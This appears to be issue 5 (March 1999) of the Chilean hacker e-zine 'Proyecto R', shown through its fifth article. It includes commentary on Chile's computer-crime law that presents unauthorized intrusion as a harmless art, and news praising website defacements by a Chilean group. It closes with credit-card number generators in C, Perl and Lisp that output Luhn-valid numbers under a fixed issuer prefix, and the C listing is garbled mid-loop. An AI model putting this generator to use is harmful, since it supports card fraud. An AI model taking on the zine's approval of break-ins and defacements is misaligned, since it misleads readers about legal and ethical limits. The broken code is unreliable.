Ley Informatica en Chile, El ultimo Hack Chileno, Tarjetas de Credito, Seguridad en Windows NT, Linux por todos y para todos, Programacion de Sockets El poder de Internet, Crackeando Pwl's - PWLOSR, Accesos Remotos y otras Hirvas, Como hacer una Pearl Box, Selvas No tan Virgenes, Electronica Basica, Virus y troyanos VBA, Phreak a la carta, Introduccion al AS/400 II Parte, BackDoorS (NewS).....
Texto Completo:
....
.oH*RR$Wx.
x*#"~```"!Rn
z!~ ~@!
xZ~+osem+e. `Mi BIENVENIDOS -- BIENVENIDOS!!
$? 'M$$~4$$L `$:
dR WTQ Q$$ !W ~ AL PRIMER MAGAZINE ELECTRONICO ~
*! RN$ $$* `R <>
! !@$ .R$! !k PARA HISPANOAMERICA
'$ $$$oW@# @k
'$ $TR?$$ @F ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'R $WR4$$L $! Õ Õ
$L $$R RTN :$~ Õ >>>-PROYECTO_R--> Õ
?B $$R `M$: X$ Õ Õ
`$: $EN M$W: .*F Õ "La copia infeliz del Eden" Õ
!$.+***@.`*!R.!H Õ @@@@@@@@@@@@@@@@@@@@@@@@@ Õ
`?NL ```W@" Õ Õ
`#$m. .u@#~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~H#tWXW$*"`
``"""""
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
*_* *_* *_* *_* *_* *_* *_* *_* *_* *_* *_* *_* *_* *_* *_* *_* *_* *_* *_* *
<< NUMERO "5" >>
MARZO 1999
URL: http://www.bigfoot.com/~proyecto_r
http://www.geocities.com/colosseum/sideline/9497
E-Mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Los ChiKos de la "R" son :
==PlaXiuS==
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
==AnDyK==
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
==Mate Swichman==
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
==The TAkER==
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Colaboradores en este numero :
==MoonSpell==
==Mr.Nexus==
==ArcangNet==
==Ozono+2==
==Madjester==
==Ocsic==
==Venabente==
SUPERHACKER DE ESTA EDICION : "BLACKMAN"
SUPERLAMER DE ESTA EDICION : "DEFRACKER" dejate de webear en irc
preguntando por un tal escuadron AntiBakania y dandotelas de malo ,
ser HACKER no significa insultar a la Gente !!!!
"Escuadron Antibakania" : Otros lamers de Mierda , creen que pueden
hacerse llamar hackers por bombardear un correo , y los muy estupidos
ponen en su pagina un mailbombing alentando al resto de los idiotas
a hacer lo mismo , siendo que esa porqueria de UNABOMB imprime
tu direccion IP , eso cualquie Wannabe lo sabe !!! Gente como Uds
ensuscian el arte del Hacking !!!
Saludos : Raregazz, SET, JJF/Hackers Team, RAZA-MEXICANA, X-Ploit Team,
DarkCl , NTerror , Ozono+2 , AccionX,Zine_Store (Mau), Avenger Gateway,
Vanhackez,Raredudez, Don CuCumber, Access, Merphe, Sonny, ZED, PaTa,
Yo_Soy, Guybrush, Skyller, ToniK, Mr. Silence, EndlessRoad, Mr. NexuS
y a todos aquellos que de alguna u otra forma han hecho posible que
este mundo en el que nos movemos vaya poniendose cada vez mejor...
Proyecto_r es un informativo electronico dise¤ado y estructurado con
aportes voluntarios , La informacion aki publicada esta dirigida a
todo akel informatico que desee estar al tanto de informacion de
relevancia en el area .. No es nuestro animo ni finalidad , incitar
a la ilegalidad ya que toda la informacion aki presentada esta inspirada
en fines netamente educativos , didactico e informativos ..
No nos hacemos responsables de de ningun acto que se cometa .. con la
informacion aki publicada ..
SOPORTE 911 #########################
HelpDesk: Alo sip digame en que puedo servirle.
Usuario: Mira tengo un problema no puedo ver una direccion
en internet ..
HelpDesk: MMmmm .. a ver a ver ... cual es la direccion
Usuario: doblebe doblebe doblebe punto reuna punto cl
HelpDesk: Mmm que extra¤os .. puede ser un problema de enlaze
espera un momento ..... no yo me puedo conectar bien .. mm y que te
dice ..
Usuario: algo de host not found ....
HelpDesk: mm que extra¤o .. espera voy a verte en seguida ..
(2 Horas despues llega HelpDesk al escritorio del usuario)
HelpDesk: Hola como estas vine tan rapido como pude a ver muestrane
Usurio: Por favor toma asiento !!! y mira el error ..
-----------------------------------------------------------------
| << | >> | STOP | COLGAR | COlGAR Con JAva | Internet Exploiter|
-----------------------------------------------------------------
| URL : =| bbbbbb.reuna.cl | |
==================================================================
1 1
1 1
1 1
1 ------------------------ 1
1 1 1 1
1 1 HOST NOT FOUND 1 1
1 1 PLOP!! 1 1
1 1 1 1
1 ------------------------ 1
1 1
1 1
1 1
------------------------------------------------------------------
################################# INDICE ###################################
# #
# 1 Editorial .........................................Editor #
# 2 Antes de... Proyecto Bovine........................The TAkER #
# 3 Ley Informatica en Chile...........................PlaXius #
# 4 El ultimo Hack Chileno.............................MoonSpell #
# 5 Tarjetas de Credito................................Ocsic #
# 6 Seguridad en Windows NT............................Mr.Nexus #
# 7 Chistes, Cuentos y otras Burradas..................Varios #
# 8 Linux por todos y para todos.......................Varios #
# 9 Programacion de Sockets El poder de Internet.......Madjester #
# 10 Crackeando Pwl's - PWLOSR..........................ArcangNet #
# 11 Accesos Remotos y otras Hirvas.....................PlaXiuS #
# 12 Como hacer una Pearl Box...........................Ozono+2 #
# 13 Selvas No tan Virgenes.............................The TAkER #
# 14 Electronica Basica.................................Ocsic #
# 15 Virus y troyanos VBA...............................ArcangNet #
# 16 Phreak a la carta..................................Varios #
# 17 Introduccion al AS/400 II Parte....................The TAkER #
# 18 BackDoorS (NewS)...................................Mate Swichman #
# 19 Ha llegado mail....................................Proyecto R #
# 20 ShutDown ..........................................CDLR #
# 21 Llaves PGP ........................................CDLR #
# #
############################################################################
‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘
| |
| 1.- Editorial |
| |
½½½½½½½½½½½½½½½½½½½
__________________________________________________________________ By Editor
Bueno, parece que ser editor de esta e-zine trae algunas cosas aparte de eso
mismo, pues se deben acordar que a PlaXiuS, durante la edicion del numero
pasado le ocurrieron muchos hechos que cambiaron su vida, pues ahora me toco
a mi, y como no podia faltar, tambien ha habido muchos cambios en mi vida,
algunos personales (los que se comunican conmigo ya deben saber de que hablo)
y en el trabajo tambien, pues a la gente de arriba, le dio por cambiar la red
Netware por una Guindous NT, ya veremos que pasa...yo mientras sigo llorando
ese cambio, ahora me tocara aprender algo de inseguridad en NT...XDDD
Acerca de los proyectos que tenemos pues siguen todos adelante, lo del CD de
linux, yo por mi parte no he recibido aun ningun correo solicitandolo, pero
tampoco es que sea muy dificil conseguirlo, ya que se ha puesto de moda ser
Hacker y utilizar Linux, las editoriales han aprovechado para hacer su agosto
y andan en la ola de sacar revistas con cd's de Linux regalados, hago ejemplo
con Linux Actual, que hace poco (Enero de 1999) saco su primer numero o por
lo menos llego el primer numero a Colombia y en alguna parte de su editorial
dice "Esta publicacion nace como hermana menor de la revista PROGRAMACION
ACTUAL, la cual siempre ha estado inmersa en todo aquello relacionado con
GNU/Linux. Incluso pudo ser un especial de Programacion Actual pero, al
final, decidimos sacarla bajo este nombre y esperar las reacciones a este
primer numero para decidir el formato definitivo de Linux Actual". Creo que
eso lo dice todo, es para ver que pasa, para ver si les funciona la idea o no
ya que la empresas no confian en software que vaya siendo por ahi regalado
y sin un numero de soporte...esperemos que algun dia se den cuenta de todo
lo que desperdician...
El UnderDrinK, si han pasado por la pagina ya se habran dado cuenta que por
fin ha cambiado, y se han agregado unas cuantas cosillas, y el UnderDrinK
es una de ellas, alli pueden bajar el formulario para inscribirse, y luego
deben enviarlo al e-mail de la revista o a alguno de los CDLR, este evento
no pretende ser como las grandes reuniones que se realizan en otros paises
pero puede ser un buen comienzo, como ya saben, va a ser en diferentes
paises, y organizarla tomara tiempo, pero mientras mas gente se inscriba
mas rapido se podra realizar...
Proyecto Bovine, sigue adelante, ya cayo el DES III y ahora se continuara
con el RC5-64, tambien puedes encontrar informacion en la pagina de Proyecto
R, o preguntar a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
alli aclararemos todas las dudas.
Ademas se ha incorporado un nuevo proyecto a Nuestra Lista, es algo asi como
el Proyecto GNU, la idea es montar un sitio donde ustedes y nosotros pongamos
los codigos fuentes de programas creados por nosotros para que todo el mundo
tenga acceso a ellos, y si les interesa y pueden los bajan, los mejoran, y
los vuelven a subir, pronto estara lista la pagina de este proyecto...
A GuyBrush que anda ausente le digo Gracias, pues por el he aprendido mucho,
no quiero decir con esto que hablara con el constantemente, es mas creo que
nunca hable con el, pero con la rienda que le dio a RareGaZz me dio un gran
impulso para seguir adelante...espero que vuelvas pronto...y a AzumLord
adelante...
Huyyy, creo que si sigo con esto el editorial, se me va a ir mas largo que
la revista XDD..
Solo, disfruten este numero y...
Que VIVA EL HACK...!!!
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
úúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúú
‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘
| |
| 2. Antes de... |
| Proyecto Bovine |
| |
½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½
________________________________________________________________ By The TAkER
Antes que nada quiero contarles que esto debia ir en la editorial, pero
la verdad creo que me estaba quedando un poco larga y por eso decidi poner
un apartado exclusivamente para ella, ya que es de interes para todos.
Como Unirse Proyecto R RC5 Team, facil...
1. Antes que nada debe aparecer tu e-mail en las estadisticas de la pagina
de distributed.net, alli en la parte de abajo aparece un boton que dice
"Mail me a password" (o enviame un password para los que esten mal de Inglis)
Para ver tus estadisticas en distributed.net, lo podes hacer de dos
formas, por medio del cliente en Help, Online, My personal email RC5
statistics, eso te lleva a una pagina donde debes haceer click en Here,
o algo asi...alli te lleva a otra page donde debes poner tu email y
debes aparecer... o pon esto en tu navegador:
http://rc5stats.distributed.net/rc5-64/msearch.php3?st=tu@email
P: Por que no aparezco en las estadisticas de distributed.net...???
R: El servidor de estadisticas se actualiza diariamente, casi siempre
a las 00:00 de no se donde...asi que debe pasar mas de un dia para que
el primer bloque que hayas enviado a distributed.net pase a formar
parte de las estadisticas, despues de eso si debes aparecer.
2. Despues de dar hecho click en ese boton, seras llevado a la pagina diabo..
upss eso no iba ahi..., iras a una pagina que dice "Your Password has been
Mailed!".
P: Por que no recibi mi password...???
R: Si despues de un periodo razonable de Tiempo (15 a¤os...jejeje,
minutos) no has recibido tu password via e-mail, vuelve a la pagina de
estadisticas y has click en el boton "whoops I can't seem to find my
password. Can you send it to me again?". Si despues de esto tampoco
logras conseguir tu password mejor vete a cazar patos con una pistola
de agua, y luego manda un email a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
contandole tu
problema.
3. Despues de haber recibido el password, debes volver a la pagina de las
estadisticas, y al final de esta hay un lugar donde debes colocar tu password.
pones el password tal como te llego y das click en el boton "Edit Participant
Information"
4. Si todo hasta aqui ha ido bien, ahora podras escoger entre los muchos
equipos que hay, la ultima vez que lo hice fue asignandole el numero, pero
tambien dicen que pronto habra una interfaz grafica para hacerlo.
Bueno, por ultimo queda recordarles que el ID de Proyecto R RC5 Team es el
10377, en este momento hay tres participantes en el grupo, PlaXiuS, yop, y
un participante Incognito, aun no he podido saber quien es porque el servidor
original de estadisticas de distributed.net saco la mano y pues...solo esta
dando la informacion de los bloques que se han procesado...pero la verdad
pensandolo bien creo que es AndyK, pues busque su e-mail y aparecio ;)
hasta hoy 20 de marzo de 1999 estamos en el puesto 3830 y llevamos 96 dias
trabajando, tambien se que la gente de SET lleva 137 dias y esta en el puesto
2809 con 13 integrantes, de los otros no les puedo contar, pero esten atentos
en la web, estare actualizando los datos pues aunque no es oficial (o si..??)
parece que es un desafio entre todos los grupos de Hack Hispano, y la meta es
llegar a estar entre los 100 primeros...a ver quien puede... ;)
Ahhh, y pasa lo mismo para inscribirse a algun grupo, por ahora no se puede,
en este momento estoy esribiendo a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
a ver si me cuentan
como puede hacerse mientras ponen a funcionar de nuevo su servidor.
Lo siento...bye...
The TAkER
Bueno, hoy 21 me dio por ir a buscar a los de JJF y por fin los encontre,
van en el puesto 1850 (van barriendo con todos nosotros), de ayer a hoy
subieron 8 posiciones y tienen 29 Miembros.
Los de SET subieron 4 puestos y siguen con 13 miembros, ahora estan en la
posicion 2805.
Nosotros subimos 80, si 80 puestos y seguimos con tres miembros, y vamos de
3750...mmmm definitivamente luy lejos, pero solo somos tres, a ver si nos
ayudan y se inscriben...
Ademas se me ocurrio una idea, si definitivamente queres unirte a nuestro
grupo lo antes posible, pues configura tu cliente con el email de alguno de
nosotros (ya sabes,
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
) mientras se soluciona el problema
del servidor de estadisticas...a ver si podemos alcanzar a los de JJF, pues
no se pero creo que vamos de ultimos...
Tambien me extra¤a no haber visto a la gente de RareGaZz, si alguien sabe
algo que me escriba.
Otra Vez hasta la proxima
The TAkER
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
úúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúú
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
/ /
/ 3. LEY INFORMATICA EN CHILE /
/ /
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
_____________________________________________________________ By PlaXiuS
Bueno un dia de Febrero iba a mi casa en el subterraneo y de pronto
lei asi de pasadita un articulo en el diario La Segunda , asi que
aqui les muestro el articulo que pertenece a esta excelente
publicacion
******* inicio del articulo *************
541 d¡as de presidio para ex funcionario que saboteo sistemas
computacionales del SII .
** Tribunal determino que el acusado provoco intencionalmente caidas del
sistema computacional que produjieron problemas y demoras en operacion
renta 1996 .
** Se trata de un "hacker" , usuario experto que usa sus habilidades
para entrar a una red computacional y demostrar la vulnerabilidad
de los sistemas de seguridad .
La jueza del decimosexto juzgado del crimen de santiago , rosa Maria
Pinto , condeno a 541 dias de presidio , remitido , y al pago de una
indemnizacion de .934.163 (unos U$ 6000) al ex funcionario del Dpto
de Informatica del SII , Juan Alberto Cano Cano . Esto , por haber
obstaculizado el funcionamiento y haber provocado intencionalmente las
caidas del sistema computacional del organismo fiscalizador , que en
abril de 1995 produhieron problemas y demoras en la operacion Renta .
Se trata de la primera condena por delito dictada por los tribunales
chilenos desde que entrara en vigencia la ley 19.223 , normativa que
tipifica las figuras penales relacionadas con esta materia .
*Como surgio la investigacion*
La causa se inicio en 1995 a raiz de una querella presentada por el
propio SII en contra de quienes resultaran responsables de una serie
de extra¤as y reiteradas interrupciones sufridas por los euqipos
computacionales de la entidad en la Direccion Regional Santiago Centro
, fenomeno que , tras una acuciosa revision tecnica de los sistemas
por parte de expertos en la materia , fue atribuido a una intervencion
humana .
Fue asi como el tribunal , en el curso del proceso , logor acreditar
que Cano , en reiteradas oportunidades , intervino fisicamente los
equipos , elimindando procesos de respaldo de informacion y provocando
premeditadamente la caida de los sistemas , lo que produjo numerosas
dificulatades en los momentos que se realizaba la Operacion Renta 1996.
*CDE represento al SII en la causa*
La ultimo etapa del proceso fue llevada por el Consejo de Defensa del
Estado, ya que el SII le entrego a esa entidad su respresentacion a
raiz de que al momentos de ocurrir los hechos el inculpado era uno de
sus funcionarios .
****Fin del Articulo *******
Bueno el caso presentado no es ningun acto de hacking ni nada por el
estilo ya que este tipo tenia acceso a los sistemas y los manipulaba
fisicamente (cosa que no requiere ningun conocimiento mayor que digamos)
pero lo grave de esta situacion es el contexto que ha tomado el caso .
Creo que las sanciones son extremas y mas que nada fueron ejemplificadoras
para asi asustar a la prole Under de chile . Me parece excelente que
se castiguen los hechos de vandalismo en la Red , pero desgraciadamente
estos tipo no conocen la diferencia entre lo que es un Idiota que se dedica
a bajar y destruir informacion a un simple e inofensivo Hacker . El
problema que surgue , es que si te llegaran a sorprender dentro de un
sistema , podrias correr un parecido destino al de este tipo . Lo mas triste
de todo es la pena que le han dado a este tipo , que me parece mas que
injusta ya que hay asesinos , ladrones y violadores que permanecen semanas
si es que no son dias , en las carceles ;gracias a la incompetencia de los
tribunales , la justicia , y el estado Chileno . Bueno pero que le vamos
un pais gobernado por viejos incompetentes ; es un Pais incompetente .
No significa que la gente lo sea , si no que todos los estamentos que
deberian funcionar por el pro de la comunidad , funcionan como las weas .
Se gastan millones y millones en campa¤as politicas , viaticos , etc..
mientras hay hospitales que no tienen los suficientes recursos para
cuidar a los enfermos , gente que vive en las calles .. buaa que rabia
no ...bueno aki les va la famosa ley 19.223 que para mi gusto es bastante
pobre y poco objetiva .
## LEY 19.223 ###
DO 07.06.93 TEXTO Ley 19.223 1993 MINISTERIO DE JUSTICIA SUBSECRETARIA DE
JUSTICIA PODER LEGISLATIVO
Ministerio De Justicia
LEY NUM. 19.223
TIPIFICA FIGURAS PENALES RELATIVAS A LA INFORMATICA
Teniendo presente que el H. Congreso Nacional ha dado su aprobación al
siguiente Proyecto de Ley:
"Articulo 1°.- El que maliciosamente destruya o inutilice un sistema de
tratamiento de informacion o sus partes o componentes, o impida, obstaculice
o modifique su funcionamiento, sufrira la pena de presidio menor en su grado
medio a maximo. Si como consecuencia de estas conductas se afectaren los
datos contenidos en el sistema, se aplicara la pena se¤alada en el inciso
anterior, en su grado maximo.
Articulo 2°.- El que con el animo de apoderarse, usar o conocer,
indebidamente de la informacion contenida en un sistema de tratamiento de la
misma, lo intercepte, interfiera o acceda a el, sera castigado con presidio
menor en su grado minimo a medio.
Articulo 3°.- El que maliciosamente altere, da¤e o destruya los datos
contenidos en un sistema de tratamiento de informacion, sera castigado con
presidio menor en su grado medio.
Articulo 4°.- El que maliciosamente revele o difunda los datos contenidos en
un sistema de informacion, sufrira la pena de presidio menor en su grado
medio. Si quien incurre en estas conductas es el responsable del sistema de
informacion, la pena se aumentara en un grado.
Y por cuanto he tenido a bien aprobarlo y sancionarlo.
Por tanto promulguese y llevese a efecto como Ley de la Republica.
Santiago, 28 de Mayo de 1993.- ENRIQUE KRAUSS RUSQUE, Vicepresidente de la
Republica.- Francisco Cumplido Cereceda, Ministro de Justicia. Lo que
transcribo a Ud. para su conocimiento.- Saluda atentamente a Ud., Martita
W”rner Tapia, Subsecretario de Justicia.
Bueno aki unos detalles de las condenas aki descritas ***************
PRESIDIO MENOR (61 dias a 5 a¤os)
Grado Máximo (3 a¤os y 1 dia a 5 a¤os). Conlleva inhabilitacion
absoluta y perpetua de derechos políticos y la inhabilitacion
absoluta mientras dure la pena para ejercer cargos publicos.
Debiera conllevar trabajos prescritos por el establecimiento penal
pero en la práctica no ocurre.
Grado Medio (541 dias a 3a¤os). Conlleva suspension de cargo
publico durante el tiempo de la condena.Debiera conllevar trabajos
prescritos por el establecimiento penal pero en la practica no
ocurre.
Grado Minimo (61 dias a 540 dias). Conlleva suspension de cargo
publico durante el tiempo de la condena. Debiera conllevar
trabajos prescritos por el establecimiento penal pero en la
practica no ocurre.
Como veran la Ley no contempla al Hacking como delito , ya que como todos
saben , un "Hacker" entra a un sistema como un desafio personal , trata de
obtener el control del sistema ; pero jamas da¤ara , robara , ni inutilizara
la informacion de un sistema (Exepto k sean estos ladrones de DICOM jeje) .
El problema son las "paginas crackeadas" , ya que normalmente a muchos
chikos les gusta dejar sus huellas en las webs .. pero la legislacion pena
esta practica . Asi que saquen sus propias conclusiones , como ya dije el
"Hacking" en si no es un delito , puede que en el proceso al correr un
Xploit o reiniciar algun servicio , estes violando la LEY . Ademas ten super
claro que si te pillan hackiando un server , ten por seguro que te hecharan
la culpa de cualquier anomalia en sus sistemas e incluos te levantaran falsos
cargos (algo poco extra¤o en la Justicia) , inculpandote de terrorismo ,
espionaje y queizas cuantas pavadas mas .. De hecho ten claro que el gobierno
tratara de conseguir penas ejemplificadoras para amedrentar a los chikos que
aman este Arte y no se dan cuanta que lo unico que hacen es convertir sus
redes en blancos mas faciles ... por que normalmente los administradores
se dan cuenta de sus fallos una vez que los han hackeado (normalmente cuando
les dejan un mensajito o los agarran pa la palanca o les cambian las webs)
y al final a travez de estas lecciones se pueden evitar da¤os peores ..
borrado , de informacion , robos , etc..
Bueno eso es todo espero que saquen sus propias conclusiones !!!
PlaXiuS
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
úúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúú
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
§ §
§ 4. El Ultimo Hack Chileno §
§ §
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
________________________________________________________________ By MoonSpell
El ultimo hack perpretado en en chile fue el que sufrio la pagina de
la universidad de atacama en el mes de diciembre de el año pasado el
ataque fue atribuido al nuevo grupo de hacks chilenos darkcl este
grupo compuesto por 6 hacks chilenos entro a el servidor de la
universidad de atacama y adultero la homepage de dicha universidad, lo
mas entretenido de todo esto es que los administradores de la uda
quedaron perplejos ante el inusual ataque pidiendole ayuda a los de la
unap (universidad Arturo prat), quienes no fueron capazes de dar con
el ip de los responsables quedando de manifiesto que en chile la
seguridad si es que existe es muy poca y que los administradores de
sistemas no estan debidamente capacitados para responder ante un caso
como este asi que aunque nos de gran verguenza de que en chile un pais
que se supone que para el año 2.000 todos los colegios tendran acceso
a internet los administradores de algunas universidades no esten
capacitados para responder ante casos como estos....................
y ademas deveriamos estar felices como chilenos que existe algun grupo
de verdad que saque la cara por nosostros y me gustaria llamar un poco
la atencion a los famosos canales #hackers sobre todo a los de
irc.chilesat.cl, irc.rdc.cl, irc.reuna.cl que por favor lean un poco al
menos ya que en mis pocas visitas a esto canales con lo unico que
me encontrado es con gente que traspasa claves para el adultcheck y
otros que preguntan que hay que hacer para comprar gratis por internet
y especialmente para ti kaicer de irc reuna no seas tan lamer (me
pregunto como tenia que hacer para entrar a su universidad para pagar
su arancel eso si que da verguenza como es posible que en chile a lo
mas podrias haber preguntado como entrar al parlamento britanico y
pedir la liberacion pronta de nuestro querido general :) :)
pero no importa eso sera para otra gracias a Proyecto_R por dejar
desahogarme un poco con todas aquellas personas que no deverian
conectarse y deverian leer un poco mas nos vemos y que lo pasen a todo
pentium................
Nota de PlaXiuS : Bueno hace unas semanas atras los chikos de DarkCl
se inscribieron en los Hacks de la 2600 con el hack cometido al
consejo nacional de television (www.cntv.cl) , ademas me he enterado que
han tenido ciertos aciertos con otras paginas y servidores como que han
crackeado "" si ese es el termino XDD "" la pagina de #gaychile , ademas
de entrar en otros servers importantes ; asi que prole chilena asujetense
los pantalones que estos chikos se las traen .
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®®
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
§ §
§ 5.- Tarjetas de Credito §
§ §
§ §
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
___________________________________________________________________ By Ocsic
Tarjetas de Credito
====================
Este no es un articulo que explique como hacer carding ni nada de eso,
este articulo se centra en el algoritmo de las tarjetas de credito.
Pongo como codigo fuente de la implementacion el cual esta en C y Perl...
Algoritmo:
Digitos: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
Numero: 5 4 4 1 9 1 5 3 3 7 8 2 3 2 1 0
En palabras es: La suma de los digitos Pares (2,4,6...) con el Doble de
los Impares (1,3,5...) ( si son mayores de 9 se le resta 9 ) debe ser
multiplo de 10.
Ese es una tarjeta valida, bueno ahora comprobemos lo que dije:
La suma de los pares:
4+1+1+3+7+2+2+0 = 20
con el doble de los impares...;
digito 1 = 5 pero el doble es 10 (aqui hay que restarle 9
puesto que es mayor que 9) entonces el valor es 1
y asi se repite con todos los impares
digito 1 = 1
digito 3 = 8
digito 5 = 9
digito 7 = 1
digito 9 = 6
digito 11= 7
digito 13= 6
+digito 15= 2
-------------
40
Y 20+40=60 y como todo sabemos 60 es multiplo de 10 asi que el numero es
VALIDO... como ven el algoritmo es sencillo y es muy facil de implementar
en un programa, bueno sin mas palabras aqui va el codigo...
gene.c -----------------------------------------------------------------
/* Generador de tarjetas de ocsic
* Uso: gene [numero de tarjetas a crear]
* gcc -o gene gene.c */
#include "stdio.h"
#include "stdlib.h"
#include "time.h"
int ccnum_count,num,l;
void show_title(void);
void make_ccnum(void);
void show_title(void) {
printf("CCGEN - Credit Card Generator\n");
printf("\n");
}
void make_ccnum(void) {
int ccnum[16],doub[8];
register int i,j=0;
char yn_choice;
int added;
ccnum[0]=5; /* Esto crea la cabecera de la tarjeta*/
ccnum[1]=4;
ccnum[2]=4;
ccnum[3]=1;
for(l=0;l9) doub[0]-=9; /* el primer indice empieza en 0 */
doub[1]=2*ccnum[2];
if(doub[1]>9) doub[1]-=9;
doub[2] = 2*ccnum[4];
if(doub[2]>9) doub[2]-=9;
doub[3] = 2*ccnum[6];
if(doub[3]>9) doub[3]-=9;
doub[4] = 2*ccnum[8];
if(doub[4]>9) doub[4]-=9;
doub[5] = 2*ccnum[10];
if(doub[5]>9) doub[5]-=9;
doub[6] = 2*ccnum[12];
if(doub[6]>9) doub[6]-=9;
doub[7] = 2*ccnum[14];
if(doub[7]>9) doub[7]-=9;
added = doub[0] + doub[1] + /* Sumamos todo*/
doub[2] + doub[3] +
doub[4] + doub[5] +
doub[6] + doub[7] +
ccnum[1] + ccnum[3] +
ccnum[5] + ccnum[7] +
ccnum[9] + ccnum[11] +
ccnum[13] + ccnum[15];
}while((added%10)!=0); /* Verificamos si es multiplo de 10*/
printf("Numero de tarjeta : "); /*Imprimimos el numero*/
for(i=1;i<=4;i++) {
for(;j<4*i;j++) printf("%d",ccnum[j]);
putchar(32);
}
printf("\n");
j=0;
}
}
void main(int argc,char *argv[]) {
if(argc<2) {
num=1;
}
else num=atoi(argv[1]);
if(num>9125) {
printf("Ouch!\n");
exit(2);
}
show_title();
make_ccnum();
exit(0);
}
----------------------------------------------------------------------------
En Perl :
gene.pl---------------------------------------------------------------------
#!/usr/bin/perl
&imprime();
&genera();
exit;
sub imprime {
print "\n";
print "Generador de tarjetas de Credito\n";
print "================================\n";
print "\n";
}
sub genera {
srand(time+rand(1200));
($num[0],$num[1],$num[2],$num[3]) =(5,4,4,1);
$suma=25;
while($suma%10){
for($i=4;$i<16;$i++){
$num[$i]=int(rand(10));
}
$added[0]=$num[0]*2;
if($added[0]>9) {$added[0]=$added[0]-9;}
$added[1]=$num[2]*2;
if($added[1]>9){ $added[1]=$added[1]-9;}
$added[2]=$num[4]*2;
if($added[2]>9) {$added[2]=$added[2]-9;}
$added[3]=$num[6]*2;
if($added[3]>9){ $added[3]=$added[3]-9;}
$added[4]=$num[8]*2;
if($added[4]>9) {$added[4]=$added[4]-9;}
$added[5]=$num[10]*2;
if($added[5]>9) {$added[5]=$added[5]-9;}
$added[6]=$num[12]*2;
if($added[6]>9){ $added[6]=$added[6]-9;}
$added[7]=$num[14]*2;
if($added[7]>9){ $added[7]=$added[7]-9;}
$suma=0;
foreach (@added) {
$suma+=$_;
}
$suma+=$num[1]+$num[3]+$num[5]+$num[7]+$num[9]+$num[11]+$num[13]+$num[15];
}
for($l=1;$l<5;$l++){
for(;$j<4*$l;$j++){ print $num[$j];}
print " ";
}
print "\n\n";
}
---------------------------------------------------------------------------
Bueno esta es la despedida y ojala que a alguien le ayude o aclare dudas...
ocsic
;Copyright ocsic
;este es otra implementacion del algoritmo en common lisp
;bueno la forma de ejecutarlo con clisp es:
; clisp -i gene.lsp
;despues pones :
;(genera)
;y tipeas n
;y te va a sali algo como esto
;#(5 4 4 1 9 0 7 5 1 3 2 0 1 7 9 0)
;y ese es el numero
;se despide :
;ocsic
(defun creditos ()
'(Generador de Tarjetas por ocsic)
)
(defun magic (lo)
(cond ( (< (* lo 2) 9) (* lo 2))
(t (- (* lo 2) 9))
))
(defun genera ()
(creditos)
(setq n (make-array 16))
(setf (aref n 0) 5)
(setf (aref n 1) 4)
(setf (aref n 2) 4)
(setf (aref n 3) 1)
(setq n2 (make-array 8))
(setq su 25)
(prog ()
bucle2
(cond ((not (zerop (mod su 10))) ; esto es como un while(su%10)
(prog (x) ;Crea los numeros aleatorios
(setq x 4) bucle
(cond ((< x 16)
(setf (aref n x) (random 10))
(setq x (add1 x))
(go bucle))))
(setf (aref n2 0) (magic (aref n 0)))
(setf (aref n2 1) (magic (aref n 2)))
(setf (aref n2 2) (magic (aref n 4)))
(setf (aref n2 3) (magic (aref n 6)))
(setf (aref n2 4) (magic (aref n 8)))
(setf (aref n2 5) (magic (aref n 10)))
(setf (aref n2 6) (magic (aref n 12)))
(setf (aref n2 7) (magic (aref n 14)))
(setq su (+
(aref n2 0) (aref n2 1) (aref n2 2)
(aref n2 3) (aref n2 4) (aref n2 5)
(aref n2 6) (aref n2 7) (aref n 1)
(aref n 3) (aref n 5) (aref n 7)
(aref n 9) (aref n 11) (aref n 13)
(aref n 15)))
(go bucle2))))) ;vuelve a la instruccion de arriba
